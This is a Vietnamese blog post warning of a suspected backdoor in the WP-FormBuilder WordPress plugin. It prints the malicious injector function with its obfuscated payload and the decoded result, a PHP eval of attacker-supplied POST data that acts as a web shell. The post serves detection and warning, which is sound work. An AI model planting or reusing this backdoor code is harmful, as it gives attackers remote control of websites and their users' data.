[Waring] Nghi Vấn BackDoor Trên WP-FormBuilder

[Waring] Nghi Vấn BackDoor Trên WP-FormBuilder
[Waring] Nghi Vấn BackDoor Trên WP-FormBuilder

Chào mọi người, cuối tuần ngồi lướt facebook mình thấy có bài viết CẢNH BÁO: NGHI VẤN BACKDOOR TRÊN WP-FormBuilder cũng khá hay và đọc kỹ thấy cũng nguy hiểm với những trang buôn bán, rất dễ bị tin tặc tấn công kiểm soát ngân hàng khi người dùng mua bán trên trang.

⚠️ Dấu hiệu: Nếu thấy file' wp-codiey.php' trong folder plugin, website bạn đã dính backdoor. File này nhìn bình thường nhưng có khả năng inject mã độc chiếm toàn quyền kiểm soát website. Thoạt nhìn nội dung file trông hoàn toàn bình thường, nhưng nó sẽ inject 1 đoạn code custom code vào plugin "insert-headers-and-footers" để chèn mã độc vào tất cả các trang của website:

function updateSnippets()
{
    require_once WP_PLUGIN_DIR . "/insert-headers-and-footers/includes/class-wpcode-generator.php";
    $new_snippet = new WPCode_Snippet((int)$_GET["id"]);
    $new_snippet->active = true;
    $new_snippet->location = 'everywhere';
    $new_snippet->auto_insert = 1;
    $new_snippet->code_type = 'php';
    $new_snippet->tags = array();
    $new_snippet->code = hex2bin(base64_decode(str_replace("vxsafAS*vasjw","",'Njk2NjIwMjg2OTczNzM2NTc0MjgyNDVmNTA0vxsafAS*vasjwZjUzNTQ1YjI3NjY3NDcwMjc1ZDI5Mjk3YjBhMjAyMDIwMjA2NTc2NjE2YzI4NDA2ODY1NzgzMjYyNjk2ZTI4MjQ1ZjvxsafAS*vasjwUwNGY1MzU0NWIyNzY2NzQ3MDI3NWQyOTI5M2IwYTIwvxsafAS*vasjwMjAyMDIwNjU3ODY5NzQyODI5M2IwYTdk')));
    $new_snippet->save();
}

Decode ra kết quả như sau:


if (isset($_POST['ftp'])){
    eval(@hex2bin($_POST['ftp']));
    exit();
}
Nếu anh em từng gặp case tương tự (plugin bị cấy mã độc, backdoor kiểu này), chia sẻ thêm ở comment để mọi người có thêm góc nhìn với nhé
p/s: detect mã độc tinh vi này bằng tool Vietnix Malware Scanner - Công cụ scan mã độc bằng Machine Learning sắp tới sẽ được release chính thức trên các cụm Hosting của Vietnix.
Tôi Hùng, Một Công Nhân Điện Lực Lệ Thủy, Thuộc Công Ty Điện Lực Quảng Trị, Chi nhánh Tổng công ty Điện Lực Miền Trung, Trực thuộc Tổng Công Ty Điện Lực Việt Nam. Tôi có đam mê với lập trình website/…

3 comments

  1. Trick Pro Software
    This comment has been removed by the author.
    1. hi bạn, mình không phải bên mãng kỹ thuật, mình bên kinh doanh nên việc đấu dây thế nào mình không rỏ bạn nhé.
  2. https://www.youtube.com/watch?v=AiK_0-xiI7Q
👉 Nội dung liên quan: Nhận xét cần tập trung vào chủ đề của bài viết hoặc giao diện đang chia sẻ.

👉 Văn hóa ứng xử: Không sử dụng ngôn từ tục tĩu, xúc phạm, phân biệt chủng tộc hoặc kích động.

👉 Không Spam/Quảng cáo: Nghiêm cấm chèn link spam, quảng cáo dịch vụ/sản phẩm không liên quan hoặc rác điện tử.

👉 Tôn trọng quyền riêng tư: Không chia sẻ thông tin cá nhân của người khác (doxxing).
Ngôn ngữ: Khuyến khích tiếng Việt có dấu, rõ ràng.

👉 Quyền quản trị: Quản trị viên có quyền xóa hoặc chỉnh sửa bình luận vi phạm mà không cần báo trước.
Hung Pro VN © 2015
Tôi Lê Hùng, chia sẽ kiến thức và tư duy sáng tạo của bản thân mỗi ngày cho cộng đồng Internet Việt Nam hiện tại.
Developed by Jago Desain